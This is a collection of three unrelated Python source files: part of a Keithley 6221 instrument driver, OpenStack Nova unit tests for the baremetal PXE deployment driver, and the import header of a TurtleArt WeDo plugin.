":SOUR:WAVE:DUR:TIME?", ":SOUR:WAVE:DUR:TIME %g",
"""A floating point property that controls the duration of the
waveform in seconds. Valid values are in range 100e-9 to 999999.999.
""",
validator=truncated_range,
values=[100e-9, 999999.999]
)
waveform_duration_cycles = Instrument.control(
":SOUR:WAVE:DUR:CYCL?", ":SOUR:WAVE:DUR:CYCL %g",
"""A floating point property that controls the duration of the
waveform in cycles. Valid values are in range 1e-3 to 99999999900.
""",
validator=truncated_range,
values=[1e-3, 99999999900]
)
def waveform_duration_set_infinity(self):
""" Set the waveform duration to infinity.
"""
self.write(":SOUR:WAVE:DUR:TIME INF")
waveform_ranging = Instrument.control(
":SOUR:WAVE:RANG?", ":SOUR:WAVE:RANG %s",
""" A string property that controls the source ranging of the
waveform. Valid values are "best" and "fixed". """,
values={"best": "BEST", "fixed": "FIX"},
map_values=True,
)
waveform_use_phasemarker = Instrument.control(
":SOUR:WAVE:PMAR:STAT?", ":SOUR:WAVE:PMAR:STAT %s",
""" A boolean property that controls whether the phase marker option
        is turned on or off. Valid values are True (on) or False (off). Other
settings for the phase marker have not yet been implemented.""",
values={True: 1, False: 0},
map_values=True,
)
def waveform_arm(self):
""" Arm the current waveform function. """
self.write(":SOUR:WAVE:ARM")
def waveform_start(self):
""" Start the waveform output. Must already be armed """
self.write(":SOUR:WAVE:INIT")
def waveform_abort(self):
""" Abort the waveform output and disarm the waveform function. """
self.write(":SOUR:WAVE:ABOR")
def define_arbitary_waveform(self, datapoints, location=1):
""" Define the data points for the arbitrary waveform and copy the
defined waveform into the given storage location.
:param datapoints: a list (or numpy array) of the data points; all
values have to be between -1 and 1; 100 points maximum.
:param location: integer storage location to store the waveform in.
Value must be in range 1 to 4.
"""
# Check validity of parameters
if not isinstance(datapoints, (list, np.ndarray)):
raise ValueError("datapoints must be a list or numpy array")
elif len(datapoints) > 100:
raise ValueError("datapoints cannot be longer than 100 points")
elif not all([x >= -1 and x <= 1 for x in datapoints]):
raise ValueError("all data points must be between -1 and 1")
if location not in [1, 2, 3, 4]:
raise ValueError("location must be in [1, 2, 3, 4]")
# Make list of strings
datapoints = [str(x) for x in datapoints]
data = ", ".join(datapoints)
# Write the data points to the Keithley 6221
self.write(":SOUR:WAVE:ARB:DATA %s" % data)
# Copy the written data to the specified location
self.write(":SOUR:WAVE:ARB:COPY %d" % location)
# Select the newly made arbitrary waveform as waveform function
self.waveform_function = "arbitrary%d" % location
def __init__(self, adapter, **kwargs):
super(Keithley6221, self).__init__(
adapter, "Keithley 6221 SourceMeter", **kwargs
)
def enable_source(self):
""" Enables the source of current or voltage depending on the
configuration of the instrument. """
self.write("OUTPUT ON")
def disable_source(self):
""" Disables the source of current or voltage depending on the
configuration of the instrument. """
self.write("OUTPUT OFF")
def beep(self, frequency, duration):
""" Sounds a system beep.
:param frequency: A frequency in Hz between 65 Hz and 2 MHz
:param duration: A time in seconds between 0 and 7.9 seconds
"""
self.write(":SYST:BEEP %g, %g" % (frequency, duration))
def triad(self, base_frequency, duration):
""" Sounds a musical triad using the system beep.
:param base_frequency: A frequency in Hz between 65 Hz and 1.3 MHz
:param duration: A time in seconds between 0 and 7.9 seconds
"""
self.beep(base_frequency, duration)
time.sleep(duration)
self.beep(base_frequency * 5.0 / 4.0, duration)
time.sleep(duration)
self.beep(base_frequency * 6.0 / 4.0, duration)
display_enabled = Instrument.control(
":DISP:ENAB?", ":DISP:ENAB %d",
""" A boolean property that controls whether or not the display of the
sourcemeter is enabled. Valid values are True and False. """,
values={True: 1, False: 0},
map_values=True,
)
@property
def error(self):
""" Returns a tuple of an error code and message from a
single error. """
err = self.values(":system:error?")
if len(err) < 2:
err = self.read() # Try reading again
code = err[0]
message = err[1].replace('"', '')
return (code, message)
def check_errors(self):
""" Logs any system errors reported by the instrument.
"""
code, message = self.error
while code != 0:
t = time.time()
log.info("Keithley 6221 reported error: %d, %s" % (code, message))
code, message = self.error
if (time.time() - t) > 10:
log.warning("Timed out for Keithley 6221 error retrieval.")
def reset(self):
""" Resets the instrument and clears the queue. """
self.write("status:queue:clear;*RST;:stat:pres;:*CLS;")
def trigger(self):
""" Executes a bus trigger, which can be used when
:meth:`~.trigger_on_bus` is configured.
"""
return self.write("*TRG")
def trigger_immediately(self):
""" Configures measurements to be taken with the internal
trigger at the maximum sampling rate.
"""
self.write(":ARM:SOUR IMM;:TRIG:SOUR IMM;")
def trigger_on_bus(self):
""" Configures the trigger to detect events based on the bus
trigger, which can be activated by :meth:`~.trigger`.
"""
self.write(":ARM:SOUR BUS;:TRIG:SOUR BUS;")
def set_timed_arm(self, interval):
""" Sets up the measurement to be taken with the internal
trigger at a variable sampling rate defined by the interval
in seconds between sampling points
"""
if interval > 99999.99 or interval < 0.001:
raise RangeException("Keithley 6221 can only be time"
" triggered between 1 mS and 1 Ms")
self.write(":ARM:SOUR TIM;:ARM:TIM %.3f" % interval)
def trigger_on_external(self, line=1):
""" Configures the measurement trigger to be taken from a
specific line of an external trigger
:param line: A trigger line from 1 to 4
"""
cmd = ":ARM:SOUR TLIN;:TRIG:SOUR TLIN;"
cmd += ":ARM:ILIN %d;:TRIG:ILIN %d;" % (line, line)
self.write(cmd)
def output_trigger_on_external(self, line=1, after='DEL'):
""" Configures the output trigger on the specified trigger link
line number, with the option of supplying the part of the
measurement after which the trigger should be generated
(default to delay, which is right before the measurement)
:param line: A trigger line from 1 to 4
:param after: An event string that determines when to trigger
"""
self.write(":TRIG:OUTP %s;:TRIG:OLIN %d;" % (after, line))
def disable_output_trigger(self):
""" Disables the output trigger for the Trigger layer
"""
self.write(":TRIG:OUTP NONE")
def shutdown(self):
""" Disables the output. """
log.info("Shutting down %s." % self.name)
self.disable_source()
###############
# Status bits #
###############
measurement_event_enabled = Instrument.control(
":STAT:MEAS:ENAB?", ":STAT:MEAS:ENAB %d",
""" An integer value that controls which measurement events are
registered in the Measurement Summary Bit (MSB) status bit. Refer to
the Model 6220/6221 Reference Manual for more information about
programming the status bits.
""",
cast=int,
validator=truncated_range,
values=[0, 65535],
)
operation_event_enabled = Instrument.control(
":STAT:OPER:ENAB?", ":STAT:OPER:ENAB %d",
""" An integer value that controls which operation events are
registered in the Operation Summary Bit (OSB) status bit. Refer to
the Model 6220/6221 Reference Manual for more information about
programming the status bits.
""",
cast=int,
validator=truncated_range,
values=[0, 65535],
)
questionable_event_enabled = Instrument.control(
":STAT:QUES:ENAB?", ":STAT:QUES:ENAB %d",
""" An integer value that controls which questionable events are
registered in the Questionable Summary Bit (QSB) status bit. Refer to
the Model 6220/6221 Reference Manual for more information about
programming the status bits.
""",
cast=int,
validator=truncated_range,
values=[0, 65535],
)
standard_event_enabled = Instrument.control(
"ESE?", "ESE %d",
""" An integer value that controls which standard events are
registered in the Event Summary Bit (ESB) status bit. Refer to
the Model 6220/6221 Reference Manual for more information about
programming the status bits.
""",
cast=int,
validator=truncated_range,
values=[0, 65535],
)
srq_event_enabled = Instrument.control(
"*SRE?", "*SRE %d",
""" An integer value that controls which event registers trigger the
Service Request (SRQ) status bit. Refer to the Model 6220/6221
Reference Manual for more information about programming the status
bits.
""",
cast=int,
validator=truncated_range,
values=[0, 255],
)
measurement_events = Instrument.measurement(
":STAT:MEAS?",
""" An integer value that reads which measurement events have been
registered in the Measurement event registers. Refer to the Model
6220/6221 Reference Manual for more information about programming
the status bits. Reading this value clears the register.
""",
cast=int,
)
operation_events = Instrument.measurement(
":STAT:OPER?",
""" An integer value that reads which operation events have been
registered in the Operation event registers. Refer to the Model
6220/6221 Reference Manual for more information about programming
the status bits. Reading this value clears the register.
""",
cast=int,
)
questionable_events = Instrument.measurement(
":STAT:QUES?",
""" An integer value that reads which questionable events have been
registered in the Questionable event registers. Refer to the Model
6220/6221 Reference Manual for more information about programming
the status bits. Reading this value clears the register.
""",
cast=int,
)
standard_events = Instrument.measurement(
"*ESR?",
""" An integer value that reads which standard events have been
registered in the Standard event registers. Refer to the Model
6220/6221 Reference Manual for more information about programming
the status bits. Reading this value clears the register.
""",
cast=int,
)
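# -----------------------------------------------------------------------
# Minimal usage sketch (illustration only; the GPIB address is a placeholder):
# defining an arbitrary waveform from a numpy array and running it for a
# fixed number of cycles, using the methods defined above.
# -----------------------------------------------------------------------
if __name__ == '__main__':
    keithley = Keithley6221("GPIB::12")
    keithley.clear()
    ramp = np.linspace(-1, 1, 100)                       # 100 points within [-1, 1]
    keithley.define_arbitary_waveform(ramp, location=1)  # also selects "arbitrary1"
    keithley.waveform_amplitude = 1e-3                   # 1 mA peak
    keithley.waveform_frequency = 100                    # 100 Hz
    keithley.waveform_duration_cycles = 10
    keithley.waveform_arm()
    keithley.waveform_start()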
|
|
# coding=utf-8
# Copyright 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for baremetal pxe driver."""
import os
import mox
from oslo.config import cfg
from testtools import matchers
from nova import exception
from nova import objects
from nova.openstack.common.db import exception as db_exc
from nova.tests.image import fake as fake_image
from nova.tests import utils
from nova.tests.virt.baremetal.db import base as bm_db_base
from nova.tests.virt.baremetal.db import utils as bm_db_utils
from nova.virt.baremetal import baremetal_states
from nova.virt.baremetal import db
from nova.virt.baremetal import pxe
from nova.virt.baremetal import utils as bm_utils
from nova.virt.disk import api as disk_api
from nova.virt import fake as fake_virt
CONF = cfg.CONF
COMMON_FLAGS = dict(
firewall_driver='nova.virt.baremetal.fake.FakeFirewallDriver',
host='test_host',
)
BAREMETAL_FLAGS = dict(
driver='nova.virt.baremetal.pxe.PXE',
flavor_extra_specs=['cpu_arch:test', 'test_spec:test_value'],
power_manager='nova.virt.baremetal.fake.FakePowerManager',
vif_driver='nova.virt.baremetal.fake.FakeVifDriver',
volume_driver='nova.virt.baremetal.fake.FakeVolumeDriver',
group='baremetal',
)
class BareMetalPXETestCase(bm_db_base.BMDBTestCase):
def setUp(self):
super(BareMetalPXETestCase, self).setUp()
self.flags(**COMMON_FLAGS)
self.flags(**BAREMETAL_FLAGS)
self.driver = pxe.PXE(fake_virt.FakeVirtAPI())
fake_image.stub_out_image_service(self.stubs)
self.addCleanup(fake_image.FakeImageService_reset)
self.context = utils.get_test_admin_context()
        self.test_block_device_info = None
self.instance = utils.get_test_instance()
self.test_network_info = utils.get_test_network_info()
self.node_info = bm_db_utils.new_bm_node(
service_host='test_host',
cpus=4,
memory_mb=2048,
)
self.nic_info = [
{'address': '22:22:22:22:22:22', 'datapath_id': '0x1',
'port_no': 1},
{'address': '33:33:33:33:33:33', 'datapath_id': '0x2',
'port_no': 2},
]
def _create_node(self):
# File injection is off by default, but we should continue to test it
# until it is removed.
CONF.set_override('use_file_injection', True, 'baremetal')
self.node = db.bm_node_create(self.context, self.node_info)
for nic in self.nic_info:
db.bm_interface_create(
self.context,
self.node['id'],
nic['address'],
nic['datapath_id'],
nic['port_no'],
)
self.instance['node'] = self.node['id']
self.spawn_params = dict(
admin_password='test_pass',
block_device_info=self.test_block_device_info,
context=self.context,
image_meta=utils.get_test_image_info(None,
self.instance),
injected_files=[('/fake/path', 'hello world')],
instance=self.instance,
network_info=self.test_network_info,
)
class PXEClassMethodsTestCase(BareMetalPXETestCase):
def test_build_pxe_config(self):
args = {
'deployment_id': 'aaa',
'deployment_key': 'bbb',
'deployment_iscsi_iqn': 'ccc',
'deployment_aki_path': 'ddd',
'deployment_ari_path': 'eee',
'aki_path': 'fff',
'ari_path': 'ggg',
'network_info': self.test_network_info,
}
config = pxe.build_pxe_config(**args)
self.assertThat(config, matchers.StartsWith('default deploy'))
# deploy bits are in the deploy section
start = config.index('label deploy')
end = config.index('label boot')
self.assertThat(config[start:end], matchers.MatchesAll(
matchers.Contains('kernel ddd'),
matchers.Contains('initrd=eee'),
matchers.Contains('deployment_id=aaa'),
matchers.Contains('deployment_key=bbb'),
matchers.Contains('iscsi_target_iqn=ccc'),
matchers.Not(matchers.Contains('kernel fff')),
))
# boot bits are in the boot section
start = config.index('label boot')
self.assertThat(config[start:], matchers.MatchesAll(
matchers.Contains('kernel fff'),
matchers.Contains('initrd=ggg'),
matchers.Not(matchers.Contains('kernel ddd')),
))
def test_build_pxe_network_config(self):
self.flags(
pxe_network_config=True,
group='baremetal',
)
net = utils.get_test_network_info(1)
config = pxe.build_pxe_network_config(net)
self.assertIn('eth0:off', config)
self.assertNotIn('eth1', config)
net = utils.get_test_network_info(2)
config = pxe.build_pxe_network_config(net)
self.assertIn('eth0:off', config)
self.assertIn('eth1:off', config)
def test_build_network_config(self):
net = utils.get_test_network_info(1)
config = pxe.build_network_config(net)
self.assertIn('eth0', config)
self.assertNotIn('eth1', config)
net = utils.get_test_network_info(2)
config = pxe.build_network_config(net)
self.assertIn('eth0', config)
self.assertIn('eth1', config)
def test_build_network_config_dhcp(self):
self.flags(
net_config_template='$pybasedir/nova/virt/baremetal/'
'net-dhcp.ubuntu.template',
group='baremetal',
)
net = utils.get_test_network_info()
net[0]['network']['subnets'][0]['ips'][0]['address'] = '1.2.3.4'
config = pxe.build_network_config(net)
self.assertIn('iface eth0 inet dhcp', config)
self.assertNotIn('address 1.2.3.4', config)
def test_build_network_config_static(self):
self.flags(
net_config_template='$pybasedir/nova/virt/baremetal/'
'net-static.ubuntu.template',
group='baremetal',
)
net = utils.get_test_network_info()
net[0]['network']['subnets'][0]['ips'][0]['address'] = '1.2.3.4'
config = pxe.build_network_config(net)
self.assertIn('iface eth0 inet static', config)
self.assertIn('address 1.2.3.4', config)
def test_build_network_config_static_parameters(self):
self.flags(use_ipv6=True)
self.flags(
net_config_template='$pybasedir/nova/virt/baremetal/'
'net-static.ubuntu.template',
group='baremetal'
)
net = utils.get_test_network_info()
net[0]['network']['subnets'][0]['cidr'] = '10.1.1.0/24'
net[0]['network']['subnets'][0]['gateway']['address'] = '10.1.1.1'
net[0]['network']['subnets'][0]['dns'][0]['address'] = '10.1.1.2'
net[0]['network']['subnets'][0]['dns'][1]['address'] = '10.1.1.3'
net[0]['network']['subnets'][1]['cidr'] = 'fc00::/7'
net[0]['network']['subnets'][1]['ips'][0]['address'] = 'fc00::1'
net[0]['network']['subnets'][1]['gateway']['address'] = 'fc00::2'
config = pxe.build_network_config(net)
self.assertIn('iface eth0 inet static', config)
self.assertIn('gateway 10.1.1.1', config)
self.assertIn('dns-nameservers 10.1.1.2 10.1.1.3', config)
self.assertIn('iface eth0 inet6 static', config)
self.assertIn('address fc00::1', config)
self.assertIn('netmask 7', config)
self.assertIn('gateway fc00::2', config)
def test_image_dir_path(self):
self.assertEqual(
os.path.join(CONF.instances_path, 'instance-00000001'),
pxe.get_image_dir_path(self.instance))
def test_image_file_path(self):
self.assertEqual(
os.path.join(
CONF.instances_path, 'instance-00000001', 'disk'),
pxe.get_image_file_path(self.instance))
def test_pxe_config_file_path(self):
self.instance['uuid'] = 'aaaa-bbbb-cccc'
self.assertEqual(
os.path.join(CONF.baremetal.tftp_root,
'aaaa-bbbb-cccc', 'config'),
pxe.get_pxe_config_file_path(self.instance))
def test_pxe_mac_path(self):
self.assertEqual(
os.path.join(CONF.baremetal.tftp_root,
'pxelinux.cfg', '01-23-45-67-89-ab'),
pxe.get_pxe_mac_path('23:45:67:89:AB'))
def test_get_instance_deploy_ids(self):
self.instance['extra_specs'] = {
'baremetal:deploy_kernel_id': 'aaaa',
'baremetal:deploy_ramdisk_id': 'bbbb',
}
self.flags(deploy_kernel="fail", group='baremetal')
self.flags(deploy_ramdisk="fail", group='baremetal')
self.assertEqual('aaaa', pxe.get_deploy_aki_id(self.instance))
self.assertEqual('bbbb', pxe.get_deploy_ari_id(self.instance))
def test_get_default_deploy_ids(self):
self.instance['extra_specs'] = {}
self.flags(deploy_kernel="aaaa", group='baremetal')
self.flags(deploy_ramdisk="bbbb", group='baremetal')
self.assertEqual('aaaa', pxe.get_deploy_aki_id(self.instance))
self.assertEqual('bbbb', pxe.get_deploy_ari_id(self.instance))
def test_get_partition_sizes(self):
# default "kinda.big" instance
sizes = pxe.get_partition_sizes(self.instance)
self.assertEqual(40960, sizes[0])
self.assertEqual(1024, sizes[1])
def test_swap_not_zero(self):
# override swap to 0; get_partition_sizes() should bump it to a 1 MB minimum
flavor = utils.get_test_flavor(self.context)
flavor['swap'] = 0
self.instance = utils.get_test_instance(self.context, flavor)
sizes = pxe.get_partition_sizes(self.instance)
self.assertEqual(40960, sizes[0])
self.assertEqual(1, sizes[1])
def test_get_tftp_image_info(self):
flavor = utils.get_test_flavor()
# Raises an exception when options are neither specified
# on the instance nor in the configuration file
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, flavor)
# Test that other non-true values also raise an exception
self.flags(deploy_kernel='', deploy_ramdisk='', group='baremetal')
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, flavor)
# Even if the instance includes kernel_id and ramdisk_id,
# we still need deploy_kernel_id and deploy_ramdisk_id.
# If those aren't present on the instance and aren't specified in the
# config file, then we raise an exception.
self.instance['kernel_id'] = 'aaaa'
self.instance['ramdisk_id'] = 'bbbb'
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, flavor)
# If an instance doesn't specify deploy_kernel_id or deploy_ramdisk_id,
# but defaults are set in the config file, we should use those.
# Here, we confirm both that all four values were set
# and that the proper paths are getting set for all of them
self.flags(deploy_kernel='cccc', deploy_ramdisk='dddd',
group='baremetal')
base = os.path.join(CONF.baremetal.tftp_root, self.instance['uuid'])
res = pxe.get_tftp_image_info(self.instance, flavor)
expected = {
'kernel': ['aaaa', os.path.join(base, 'kernel')],
'ramdisk': ['bbbb', os.path.join(base, 'ramdisk')],
'deploy_kernel': ['cccc', os.path.join(base, 'deploy_kernel')],
'deploy_ramdisk': ['dddd',
os.path.join(base, 'deploy_ramdisk')],
}
self.assertEqual(expected, res)
# If deploy_kernel_id and deploy_ramdisk_id are specified in the
# flavor extra_specs, they should override any default configuration.
# Note that they are read from the flavor passed in here, having been
# inherited from the flavor_extra_specs table.
extra_specs = {
'baremetal:deploy_kernel_id': 'eeee',
'baremetal:deploy_ramdisk_id': 'ffff',
}
flavor['extra_specs'] = extra_specs
res = pxe.get_tftp_image_info(self.instance, flavor)
self.assertEqual('eeee', res['deploy_kernel'][0])
self.assertEqual('ffff', res['deploy_ramdisk'][0])
# However, if invalid (empty) values are passed in the flavor
# extra_specs, this should still raise an exception.
extra_specs = {
'baremetal:deploy_kernel_id': '',
'baremetal:deploy_ramdisk_id': '',
}
flavor['extra_specs'] = extra_specs
self.assertRaises(exception.NovaException,
pxe.get_tftp_image_info,
self.instance, flavor)
class PXEPrivateMethodsTestCase(BareMetalPXETestCase):
def test_collect_mac_addresses(self):
self._create_node()
address_list = [nic['address'] for nic in self.nic_info]
address_list.sort()
macs = self.driver._collect_mac_addresses(self.context, self.node)
self.assertEqual(address_list, macs)
def test_cache_tftp_images(self):
self.instance['kernel_id'] = 'aaaa'
self.instance['ramdisk_id'] = 'bbbb'
flavor = utils.get_test_flavor()
extra_specs = {
'baremetal:deploy_kernel_id': 'cccc',
'baremetal:deploy_ramdisk_id': 'dddd',
}
flavor['extra_specs'] = extra_specs
image_info = pxe.get_tftp_image_info(self.instance, flavor)
self.mox.StubOutWithMock(os, 'makedirs')
self.mox.StubOutWithMock(os.path, 'exists')
os.makedirs(os.path.join(CONF.baremetal.tftp_root,
self.instance['uuid'])).AndReturn(True)
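# Record an os.path.exists() -> True expectation for every entry in
# image_info so the driver can treat each image as already cached and
# never attempts a download.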
for uuid, path in [image_info[label] for label in image_info]:
os.path.exists(path).AndReturn(True)
self.mox.ReplayAll()
self.driver._cache_tftp_images(
self.context, self.instance, image_info)
self.mox.VerifyAll()
def test_cache_image(self):
self.mox.StubOutWithMock(os, 'makedirs')
self.mox.StubOutWithMock(os, 'unlink')
self.mox.StubOutWithMock(os.path, 'exists')
os.makedirs(pxe.get_image_dir_path(self.instance)).AndReturn(True)
disk_path = os.path.join(
pxe.get_image_dir_path(self.instance), 'disk')
os.unlink(disk_path).AndReturn(None)
os.path.exists(disk_path).AndReturn(True)
os.path.exists(pxe.get_image_file_path(self.instance)).\
AndReturn(True)
self.mox.ReplayAll()
image_meta = utils.get_test_image_info(
self.context, self.instance)
self.driver._cache_image(
self.context, self.instance, image_meta)
self.mox.VerifyAll()
def test_inject_into_image(self):
# NOTE(deva): we could also test this method by stubbing
# nova.virt.disk.api._inject_*_into_fs
self._create_node()
files = []
self.instance['hostname'] = 'fake hostname'
files.append(('/etc/hostname', 'fake hostname'))
self.instance['key_data'] = 'fake ssh key'
net_info = utils.get_test_network_info(1)
net = pxe.build_network_config(net_info)
admin_password = 'fake password'
self.mox.StubOutWithMock(os.path, 'exists')
os.path.exists(mox.IgnoreArg()).AndReturn(True)
self.mox.StubOutWithMock(disk_api, 'inject_data')
disk_api.inject_data(
admin_password=admin_password,
image=pxe.get_image_file_path(self.instance),
key='fake ssh key',
metadata=None,
partition=None,
net=net,
files=files, # this is what we're really testing
).AndReturn(True)
self.mox.ReplayAll()
self.driver._inject_into_image(
self.context, self.node, self.instance,
network_info=net_info,
admin_password=admin_password,
injected_files=None)
self.mox.VerifyAll()
class PXEPublicMethodsTestCase(BareMetalPXETestCase):
def test_cache_images(self):
self._create_node()
self.mox.StubOutWithMock(objects.Flavor, 'get_by_id')
self.mox.StubOutWithMock(pxe, "get_tftp_image_info")
self.mox.StubOutWithMock(self.driver, "_cache_tftp_images")
self.mox.StubOutWithMock(self.driver, "_cache_image")
self.mox.StubOutWithMock(self.driver, "_inject_into_image")
objects.Flavor.get_by_id(self.context,
self.instance['instance_type_id']
).AndReturn({})
pxe.get_tftp_image_info(self.instance, {}).AndReturn([])
self.driver._cache_tftp_images(self.context, self.instance, [])
self.driver._cache_image(self.context, self.instance, [])
self.driver._inject_into_image(self.context, self.node, self.instance,
self.test_network_info, None, '')
self.mox.ReplayAll()
self.driver.cache_images(
self.context, self.node, self.instance,
admin_password='',
image_meta=[],
injected_files=None,
network_info=self.test_network_info,
)
self.mox.VerifyAll()
def test_destroy_images(self):
self._create_node()
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
bm_utils.unlink_without_raise(pxe.get_image_file_path(self.instance))
bm_utils.rmtree_without_raise(pxe.get_image_dir_path(self.instance))
self.mox.ReplayAll()
self.driver.destroy_images(self.context, self.node, self.instance)
self.mox.VerifyAll()
def test_dhcp_options_for_instance(self):
self._create_node()
self.mox.ReplayAll()
expected = [{'opt_name': 'bootfile-name',
'opt_value': CONF.baremetal.pxe_bootfile_name},
{'opt_name': 'server-ip-address', 'opt_value': CONF.my_ip},
{'opt_name': 'tftp-server', 'opt_value': CONF.my_ip}]
res = self.driver.dhcp_options_for_instance(self.instance)
# list.sort() returns None, so comparing its return values would always
# pass; sort copies by option name and compare the contents instead.
self.assertEqual(sorted(expected, key=lambda opt: opt['opt_name']),
sorted(res, key=lambda opt: opt['opt_name']))
self.mox.VerifyAll()
def test_activate_bootloader_passes_details(self):
self._create_node()
macs = [nic['address'] for nic in self.nic_info]
macs.sort()
image_info = {
'deploy_kernel': [None, 'aaaa'],
'deploy_ramdisk': [None, 'bbbb'],
'kernel': [None, 'cccc'],
'ramdisk': [None, 'dddd'],
}
self.instance['uuid'] = 'fake-uuid'
iqn = "iqn-%s" % self.instance['uuid']
pxe_config = 'this is a fake pxe config'
pxe_path = pxe.get_pxe_config_file_path(self.instance)
pxe.get_image_file_path(self.instance)
self.mox.StubOutWithMock(objects.Flavor, 'get_by_id')
self.mox.StubOutWithMock(pxe, 'get_tftp_image_info')
self.mox.StubOutWithMock(pxe, 'get_partition_sizes')
self.mox.StubOutWithMock(bm_utils, 'random_alnum')
self.mox.StubOutWithMock(pxe, 'build_pxe_config')
self.mox.StubOutWithMock(bm_utils, 'write_to_file')
self.mox.StubOutWithMock(bm_utils, 'create_link_without_raise')
objects.Flavor.get_by_id(self.context,
self.instance['instance_type_id']
).AndReturn({})
pxe.get_tftp_image_info(self.instance, {}).AndReturn(image_info)
pxe.get_partition_sizes(self.instance).AndReturn((0, 0, 0))
bm_utils.random_alnum(32).AndReturn('alnum')
pxe.build_pxe_config(
self.node['id'], 'alnum', iqn,
'aaaa', 'bbbb', 'cccc', 'dddd',
self.test_network_info).AndReturn(pxe_config)
bm_utils.write_to_file(pxe_path, pxe_config)
for mac in macs:
bm_utils.create_link_without_raise(
pxe_path, pxe.get_pxe_mac_path(mac))
self.mox.ReplayAll()
self.driver.activate_bootloader(self.context, self.node, self.instance,
network_info=self.test_network_info)
self.mox.VerifyAll()
def test_activate_and_deactivate_bootloader(self):
self._create_node()
flavor = objects.Flavor(
context=self.context,
extra_specs={
'baremetal:deploy_kernel_id': 'eeee',
'baremetal:deploy_ramdisk_id': 'ffff',
})
self.instance['uuid'] = 'fake-uuid'
self.mox.StubOutWithMock(objects.Flavor, 'get_by_id')
self.mox.StubOutWithMock(bm_utils, 'write_to_file')
self.mox.StubOutWithMock(bm_utils, 'create_link_without_raise')
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
objects.Flavor.get_by_id(
self.context, self.instance['instance_type_id']).AndReturn(
flavor)
# create the config file
bm_utils.write_to_file(mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root))
# unlink and link the 2 interfaces
for i in range(2):
bm_utils.unlink_without_raise(mox.Or(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root)))
bm_utils.create_link_without_raise(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root))
# unlink both interface links, the 4 images, and the config file (7 calls)
for i in range(7):
bm_utils.unlink_without_raise(mox.Or(
mox.StrContains('fake-uuid'),
mox.StrContains(CONF.baremetal.tftp_root)))
bm_utils.rmtree_without_raise(mox.StrContains('fake-uuid'))
self.mox.ReplayAll()
# activate and deactivate the bootloader
# and check the deployment task_state in the database
row = db.bm_node_get(self.context, 1)
self.assertIsNone(row['deploy_key'])
self.driver.activate_bootloader(self.context, self.node, self.instance,
network_info=self.test_network_info)
row = db.bm_node_get(self.context, 1)
self.assertIsNotNone(row['deploy_key'])
self.driver.deactivate_bootloader(self.context, self.node,
self.instance)
row = db.bm_node_get(self.context, 1)
self.assertIsNone(row['deploy_key'])
self.mox.VerifyAll()
def test_deactivate_bootloader_for_nonexistent_instance(self):
self._create_node()
self.instance['uuid'] = 'fake-uuid'
pxe_path = pxe.get_pxe_config_file_path(self.instance)
self.mox.StubOutWithMock(bm_utils, 'unlink_without_raise')
self.mox.StubOutWithMock(bm_utils, 'rmtree_without_raise')
self.mox.StubOutWithMock(pxe, 'get_tftp_image_info')
self.mox.StubOutWithMock(self.driver, '_collect_mac_addresses')
extra_specs = dict(extra_specs={
'baremetal:deploy_ramdisk_id': 'ignore',
'baremetal:deploy_kernel_id': 'ignore'})
pxe.get_tftp_image_info(self.instance, extra_specs).\
AndRaise(exception.NovaException)
bm_utils.unlink_without_raise(pxe_path)
self.driver._collect_mac_addresses(self.context, self.node).\
AndRaise(db_exc.DBError)
bm_utils.rmtree_without_raise(
os.path.join(CONF.baremetal.tftp_root, 'fake-uuid'))
self.mox.ReplayAll()
self.driver.deactivate_bootloader(
self.context, self.node, self.instance)
self.mox.VerifyAll()
def test_activate_node(self):
self._create_node()
self.instance['uuid'] = 'fake-uuid'
self.flags(pxe_deploy_timeout=1, group='baremetal')
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.DEPLOYING,
'instance_uuid': 'fake-uuid'})
# test timeout
self.assertRaises(exception.InstanceDeployFailure,
self.driver.activate_node,
self.context, self.node, self.instance)
# test DEPLOYDONE
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.DEPLOYDONE})
self.driver.activate_node(self.context, self.node, self.instance)
# test no deploy -- state is just ACTIVE
db.bm_node_update(self.context, 1,
{'task_state': baremetal_states.ACTIVE})
self.driver.activate_node(self.context, self.node, self.instance)
# test node gone
db.bm_node_destroy(self.context, 1)
self.assertRaises(exception.InstanceDeployFailure,
self.driver.activate_node,
self.context, self.node, self.instance)
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2011, 2012 Ian Daniher
# Copyright (c) 2012 Tony Forster, Walter Bender, Alan Aguiar
# Copyright (c) 2013 Alan Aguiar
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import sys
sys.path.insert(0, os.path.abspath('./plugins/wedo_plugin'))
from TurtleArt.tapalette import make_palette
from TurtleArt.tapalette import palette_name_to_index
from TurtleArt.tapalette import special_block_colors
from TurtleArt.tapalette import palette_blocks
from TurtleArt.talogo import logoerror
from TurtleArt.taprimitive import Primitive, ArgSlot
from TurtleArt.tatype import TYPE_INT, TYPE_NUMBER
from plugins.plugin import Plugin
from wedo import WeDo, scan_for_devices, UNAVAILABLE
from gettext import gettext as _
